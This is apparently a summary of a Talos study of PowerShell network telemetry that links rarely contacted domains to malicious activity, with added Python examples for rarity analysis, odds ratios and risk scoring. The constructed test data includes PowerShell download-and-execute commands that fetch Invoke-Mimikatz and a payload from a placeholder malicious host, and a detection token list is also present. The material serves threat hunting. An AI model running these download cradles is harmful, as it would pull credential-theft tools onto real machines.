Full Report
Talos analyzed six months of PowerShell network telemetry and found that rare domains are over three times more likely to be malicious compared to frequently contacted ones.
Analysis Summary
# Tool/Technique: PowerShell Network Connection Analysis
## Overview
This analysis summarizes findings from six months of network connection telemetry generated by PowerShell processes, reviewed to test whether how often a domain is contacted correlates with it being malicious. Domains that PowerShell rarely contacted were flagged malicious at a higher rate than frequently contacted ones, although the difference did not reach statistical significance over the study period.
## Technical Details
- Type: Technique (Risk correlation analysis)
- Platform: Windows primarily (`powershell.exe`); `pwsh.exe` also runs on Linux and macOS, so the same telemetry can come from those hosts.
- Capabilities: Threat-hunting methodology that ranks PowerShell network destinations by contact rarity and measures how strongly rarity correlates with threat-intelligence verdicts.
- First Seen: Analysis period covers June 1, 2024 – Dec. 31, 2024.
## MITRE ATT&CK Mapping
The observed activity maps to execution through a scripting interpreter and to command and control (tool download). Persistence is only a possibility the article raises, not something the telemetry establishes.
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer (downloading scripts such as PowerSploit)
- **TA0003 - Persistence** (potential only, if downloaded scripts are used to persist)
## Functionality
### Core Capabilities
- **Data Collection:** Queried network connection logs for PowerShell processes (`powershell.exe`, `pwsh.exe`, etc.) over a six-month period.
- **Domain Extraction & Rarity Definition:** Extracted 742 unique base domains. A base domain was classed as rare when its full domains (hosts) averaged $\le 5$ contacts each over the period, which yielded 550 rare base domains.
- **Threat Assessment:** Used ReversingLabs threat intelligence and manual review to flag domains as malicious.
- **Finding:** 1.64% of rare domains were flagged malicious versus 0.52% of frequently contacted domains, an odds ratio of 3.18 in favour of rare domains being malicious.
### Advanced Features
- **Subdomain Specificity:** Identified malicious activity (PowerSploit downloads, `Invoke-Mimikatz` execution) via `raw.githubusercontent.com`, a subdomain of the legitimate, frequently contacted base domain `githubusercontent.com`; base-domain rarity alone would never have surfaced it.
- **Process Comparison:** Applied the same heuristics to other command-line interpreters (`rundll32.exe`, Python, `cmd.exe`, `cscript.exe`, `wscript.exe`, `bash`, `zsh`) to show how the rare-domain signal varies by interpreter.
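The collection, rarity and odds-ratio steps above, together with the subdomain check, as an added Python example. It is not Talos' code and does not reproduce their dataset: the telemetry records, the threat-intelligence set, the suspicious-argument list and the two-entry public-suffix table are constructed assumptions for the example.

```python
"""Rare-domain analysis over PowerShell network telemetry (added example).

Illustrates the methodology summarized above; not Talos' code. The telemetry
records, the threat-intelligence set and the suspicious-argument list are
constructed, and the two-label suffix table stands in for a real public-suffix list.
"""
from collections import Counter, defaultdict
from statistics import mean

RARE_THRESHOLD = 5                                   # avg contacts per full domain
POWERSHELL = {"powershell.exe", "pwsh.exe"}
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au"}           # assumption: use the PSL on real data
MALICIOUS_BASE_DOMAINS = {"example-bad.top", "example-c2.net"}   # constructed TI hits
SUSPICIOUS_ARGS = ("Invoke-Mimikatz", "PowerSploit", "DownloadString", "IEX")  # constructed


def base_domain(host):
    """Registrable base domain (eTLD+1) of a hostname."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def _repeat(process, host, cmd, n):
    return [(process, host, cmd)] * n


# Constructed telemetry: (process, destination host, command line), with made-up
# volumes that give a few busy destinations and a tail of rarely contacted ones.
RECORDS = (
    _repeat("powershell.exe", "api.automox.com", "Invoke-RestMethod https://api.automox.com/api/servers", 40)
    + _repeat("pwsh.exe", "app.launchdarkly.com", "Invoke-WebRequest https://app.launchdarkly.com/sdk/flags", 25)
    + _repeat("powershell.exe", "s3.amazonaws.com", "Read-S3Object -BucketName backups", 12)
    + _repeat("powershell.exe", "sqs.us-east-1.amazonaws.com", "Send-SQSMessage -QueueUrl q1", 2)
    + _repeat("powershell.exe", "cdn.example-c2.net", "Invoke-WebRequest https://cdn.example-c2.net/a.png", 8)
    + _repeat("powershell.exe", "raw.githubusercontent.com",
              "IEX (New-Object Net.WebClient).DownloadString("
              "'https://raw.githubusercontent.com/example-org/PowerSploit/master/Invoke-Mimikatz.ps1')", 6)
    + _repeat("powershell.exe", "updates.example-vendor.net", "Invoke-WebRequest https://updates.example-vendor.net/agent.msi", 3)
    + _repeat("pwsh.exe", "cdn.example-tools.org", "Invoke-WebRequest https://cdn.example-tools.org/tool.zip", 2)
    + _repeat("powershell.exe", "x9k2.example-bad.top", "IEX (New-Object Net.WebClient).DownloadString('https://x9k2.example-bad.top/p')", 1)
    + _repeat("cmd.exe", "api.automox.com", "curl https://api.automox.com/api/servers", 5)   # not PowerShell, ignored
)


def powershell_contacts(records):
    """Contacts per full host, counting only PowerShell processes."""
    return Counter(host for proc, host, _ in records if proc.lower() in POWERSHELL)


def classify_base_domains(host_counts, threshold=RARE_THRESHOLD):
    """Rare = the base domain's full domains average <= threshold contacts each."""
    per_base = defaultdict(list)
    for host, n in host_counts.items():
        per_base[base_domain(host)].append(n)
    rare = {b for b, counts in per_base.items() if mean(counts) <= threshold}
    return rare, set(per_base) - rare


def malicious_rate(domains, intel):
    """Fraction of the given base domains present in the TI set."""
    return len(domains & intel) / len(domains) if domains else 0.0


def odds_ratio(rare, frequent, intel):
    """Odds that a rare domain is malicious divided by the odds for a frequent one."""
    def odds(domains):
        p = malicious_rate(domains, intel)
        return float("inf") if p == 1.0 else p / (1.0 - p)
    o_frequent = odds(frequent)
    return float("inf") if o_frequent == 0.0 else odds(rare) / o_frequent


def review_frequent_subdomains(records, frequent, tokens=SUSPICIOUS_ARGS):
    """Hosts under frequent base domains whose PowerShell command lines carry
    suspicious tokens. This is what catches raw.githubusercontent.com: its base
    domain is not rare, so the frequency test alone never surfaces it."""
    hits = defaultdict(set)
    for proc, host, cmd in records:
        if proc.lower() not in POWERSHELL or base_domain(host) not in frequent:
            continue
        for tok in tokens:
            if tok.lower() in cmd.lower():
                hits[host].add(tok)
    return {h: sorted(t) for h, t in hits.items()}


if __name__ == "__main__":
    counts = powershell_contacts(RECORDS)
    rare, frequent = classify_base_domains(counts)
    print(f"{len(rare)} rare / {len(frequent)} frequent base domains")
    print("malicious rate rare/frequent:", malicious_rate(rare, MALICIOUS_BASE_DOMAINS),
          malicious_rate(frequent, MALICIOUS_BASE_DOMAINS))
    print("odds ratio:", round(odds_ratio(rare, frequent, MALICIOUS_BASE_DOMAINS), 2))
    for host, toks in review_frequent_subdomains(RECORDS, frequent).items():
        print("review:", host, toks)
```

Two points the constructed data is built to show: `amazonaws.com` stays frequent because its two hosts average seven contacts even though one of them was seen only twice, and `raw.githubusercontent.com` is only surfaced by the command-line review, never by rarity. On real telemetry, replace the suffix table with a public-suffix-list library and the TI set with feed lookups; the odds-ratio function deliberately returns infinity rather than raising when one group has no malicious members, which is a signal that the sample is too small to score.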
## Indicators of Compromise
(Note: No explicit IoCs are provided in the text; the focus is on the *type* of IoC identified through this methodology.)
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: The key indicator type is the **Rare Domain** as defined by contact frequency.
- Potential Malicious Example (Subdomain): `raw[.]githubusercontent[.]com` (when associated with malicious commands).
- Legitimate High-Use Domains Observed: `automox[.]com`, `launchdarkly[.]com`, `amazonaws[.]com`.
- Behavioral Indicators: Connections initiated by PowerShell to domains rarely contacted by the process.
## Associated Threat Actors
The article does not name specific threat actors; the analysis establishes a general security methodology based on telemetry analysis.
## Detection Methods
- **Frequency Analysis:** Monitoring connections made by PowerShell processes, prioritizing domains with very low contact counts in telemetry.
- **Subdomain Review:** Detailed manual or automated review of process arguments associated with connections to high-volume, legitimate domains (e.g., cloud services).
- **Threat Intelligence Integration:** Correlating domain connections against established threat intelligence feeds (e.g., ReversingLabs).
## Mitigation Strategies
- **Prioritize Rare Domain Investigation:** Focus security investigations on network connections to domains PowerShell communicates with infrequently.
- **Mandatory Subdomain/Content Analysis:** Never trust the base domain alone; actively inspect subdomains, especially for large cloud/dev platforms, for malicious payload hosting.
- **Refine Detection Logic:** Develop risk scoring systems that integrate contact frequency, TLDs, and existing threat intelligence feeds.
- **Investigate Anomalous Scripting Usage:** Pay special attention to interpreters that seldom make network connections, such as `wscript.exe`, when they suddenly contact external hosts; in this study their connections showed a high likelihood of malicious use.
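A minimal triage score for the "Refine Detection Logic" and "Investigate Anomalous Scripting Usage" points above, as an added Python example. It is not Talos' scoring: the weights, the risky-TLD list, the threat-intelligence hits and the per-host contact summary are constructed assumptions to be tuned against your own telemetry.

```python
"""Risk scoring for interpreter network contacts (added example, not Talos' code).

Combines the four signals the summary names: contact rarity, TLD, a threat-intel
hit, and an interpreter that rarely makes network calls. All weights and lists
below are assumptions for illustration.
"""
RARE_THRESHOLD = 5                                          # contacts in the review window
RARE_INTERPRETERS = {"wscript.exe", "cscript.exe"}          # seldom network-active on a healthy host
RISKY_TLDS = {"top", "xyz", "zip"}                          # assumption: derive from your own data
TI_FLAGGED = {"x9k2.example-bad.top", "cdn.example-c2.net"}  # constructed TI hits (full hosts)
WEIGHTS = {"rare_domain": 3, "ti_hit": 5, "risky_tld": 2, "rare_interpreter": 2}  # assumed


def score_contact(process, host, contacts, intel=TI_FLAGGED):
    """Return (score, reasons) for one (process, host) pair seen `contacts` times."""
    reasons = []
    if contacts <= RARE_THRESHOLD:
        reasons.append("rare_domain")
    if host.lower() in intel:
        reasons.append("ti_hit")
    if host.lower().rsplit(".", 1)[-1] in RISKY_TLDS:
        reasons.append("risky_tld")
    if process.lower() in RARE_INTERPRETERS:
        reasons.append("rare_interpreter")
    return sum(WEIGHTS[r] for r in reasons), reasons


def triage(summary, intel=TI_FLAGGED):
    """Rank (process, host, contacts) rows by descending score, dropping zero-score rows."""
    ranked = []
    for process, host, contacts in summary:
        score, why = score_contact(process, host, contacts, intel)
        if score:
            ranked.append((score, process, host, why))
    ranked.sort(key=lambda r: (-r[0], r[1], r[2]))
    return ranked


# Constructed per-(process, host) contact counts over the review window.
SUMMARY = [
    ("powershell.exe", "api.automox.com", 40),
    ("powershell.exe", "cdn.example-c2.net", 8),
    ("powershell.exe", "x9k2.example-bad.top", 1),
    ("powershell.exe", "updates.example-vendor.net", 3),
    ("wscript.exe", "files.example-share.xyz", 2),
    ("cmd.exe", "api.automox.com", 5),
]

if __name__ == "__main__":
    for score, process, host, why in triage(SUMMARY):
        print(f"{score:>3}  {process:<16} {host:<30} {', '.join(why)}")
```

The ordering is the point: a rare host on a risky TLD with a TI hit outranks a TI hit alone, and a `wscript.exe` contact to a rare host ranks above a frequently contacted host that the feed has flagged, which matches the study's advice to treat network activity from seldom-used interpreters as its own signal. The `cmd.exe` row shows that a well-known destination still surfaces when an unusual process contacts it only a handful of times.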
## Related Tools/Techniques
- **Process Analysis:** Similar heuristics were analyzed for `rundll32.exe`, Python, `cmd.exe`, `cscript.exe`, `wscript.exe`, `bash`, and `zsh`.
- **Tool Mentioned in Context:** Downloads of PowerSploit and execution of `Invoke-Mimikatz` were observed linked to the malicious subdomain activity.